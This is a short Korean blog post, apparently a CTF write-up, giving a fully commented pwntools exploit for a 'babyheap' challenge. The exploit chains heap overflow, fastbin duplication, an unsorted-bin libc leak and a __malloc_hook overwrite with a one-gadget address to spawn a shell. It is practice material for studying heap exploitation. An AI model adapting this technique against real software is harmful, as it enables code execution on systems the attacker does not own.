요즘 다시 대회 문제에 손을 하나씩 대고 있는데...
힙이 아직 넘사벽이여서
힙을 공부중입니다
껄껄
그냥 fastbin duplicate + unsorted bin에 관해 알면 익스가 가능 합니다.
대충 봤는데 heap base를 릭 해서 뚜샤뚜샤 하루도 있을거 같고
mprotect를 heap 세그먼트에 써서 쉘코드 뚜샤뚜샤도 될거 같다 히히
친-절하게 주석까지 다 달아 놓음
#!/usr/bin/python
from pwn import *
p = process("./babyheap")
#p = remote("localhost",4000)
lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf = ELF("./babyheap")
def alloca(size):
p.sendline("1")
p.readuntil("Size: ")
p.sendline(str(size))
p.readuntil("Allocate Index ")
ret = int(p.readuntil("\n"))
p.readuntil("Command: ")
print("[+] Heap Allocated. %d"%(ret))
return ret
def fill(idx,size,data):
p.sendline("2")
p.readuntil("Index: ")
p.sendline(str(idx))
p.readuntil("Size: ")
p.sendline(str(size))
p.readuntil("Content: ")
p.send(data)
p.readuntil("Command: ")
print("[+] Data Filled. %d"%(idx))
return True
def free(idx):
p.sendline("3")
p.readuntil("Index: ")
p.sendline(str(idx))
p.readuntil("Command: ")
print("[*] Heap Freed. %d"%(idx))
return True
def dump(idx):
p.sendline("4")
p.readuntil("Index: ")
p.sendline(str(idx))
p.readuntil("\n")
ret = p.readuntil("1. Allocate")[:-len("1. Allocate\n")]
p.readuntil("Command: ")
print("[*] Heap Dumped. %d"%(idx))
return ret
############## EXPLOIT ##############
raw_input("READY >>> ")
print "[!] EXPLOIT START"
''' STAGE 1 '''
'''
- allocate 3 fastbins.
- allocate 2 smallbins.
'''
alloca(10) # idx : 0
alloca(10) # idx : 1
alloca(10) # idx : 2
alloca(300) # idx : 3
alloca(300) # idx : 3
''' STAGE 2 '''
'''
- Change fd of idx:3 by overflowing idx:2
'''
payload = ''
payload += p64(0)*2 # padding
payload += p64(0) #
payload += p64(0x21) # change size for fastbin duplicate
fill(2,len(payload),payload)
''' STAGE 3 '''
'''
- Free idx:0,2 for create fastbin chunk ( fd )
'''
free(0)
free(2)
''' STAGE 4 '''
'''
- Change fastbin chunk ( idx:2's fd ) by filling idx:1 for duplication
'''
payload = ''
payload += p64(0)*2
payload += p64(0)
payload += p64(0x21)
payload += p8(0x60)
fill(1,len(payload),payload)
''' STAGE 5 '''
'''
- Allocate 2 fastbins for duplication ( use-after-free? )
'''
alloca(10) # idx : 0
alloca(10) # idx : 2 <-- it points same as idx:3.
''' STAGE 6 '''
'''
- Change smallbin chunk by filling idx:1 for free smallbin
'''
payload =''
payload += p64(0)*2
payload += p64(0)
payload += p64(0x21)
payload += p64(0)*2
payload += p64(0)
payload += p64(0x141)
fill(1,len(payload),payload)
''' STAGE 7 '''
'''
- Free smallbin(idx:3) for leak main_arena ( unsorted bin )
'''
free(3)
''' STAGE 8 '''
'''
- Leak main_arena
'''
libc_main = 0
libc_main_arena = 0x3c4b20
tmp = dump(2)
leak = u64(tmp[:-2])
libc_main = leak - libc_main_arena - 88
libc_1shot = libc_main + 0x4526a
libc_mhook = libc_main + 0x3c4b10
print("[!] LEAK : 0x%x"%(leak))
print("[+] LIBC MAIN : 0x%x"%(libc_main))
print("[+] ONE-SHOT : 0x%x"%(libc_1shot))
print("[+] __malloc_hook : 0x%x"%(libc_mhook))
alloca(300)
''' STAGE 9 '''
'''
- Setting fastbin_dup_into_stack for duplicate __malloc_hook
'''
alloca(100) # idx:5
alloca(100) # idx:6
alloca(100) # idx:7
free(5)
free(7) # fastbin chunk generated
''' STAGE 10 '''
'''
- fastbin_dup_into_stack: duplicate chunk
'''
payload = ''
payload += p64(0)*12
payload += p64(0)
payload += p64(0x71)
payload += p64(libc_mhook-35) # Setting fd
fill(6,len(payload),payload)
''' STAGE 10 '''
'''
- fastbin_dup_into_stack: allocate
'''
alloca(103) # idx:5
alloca(103) # idx:7
''' STAGE 11 '''
'''
- EXPLOIT!
'''
payload = ''
payload += 'a'*(35-16)
payload += p64(libc_1shot)
fill(7,len(payload),payload)
p.sendline("1")
p.sendline("10") # shell
p.interactive()
'CTF > Problems' 카테고리의 다른 글
| [문서] Return to syscall + H3X0R CTF libsteak write up (1) | 2018.06.16 |
|---|---|
| cookbook (0) | 2016.11.13 |
| kappa write up (0) | 2016.07.21 |
| mynx writeup (0) | 2016.07.18 |
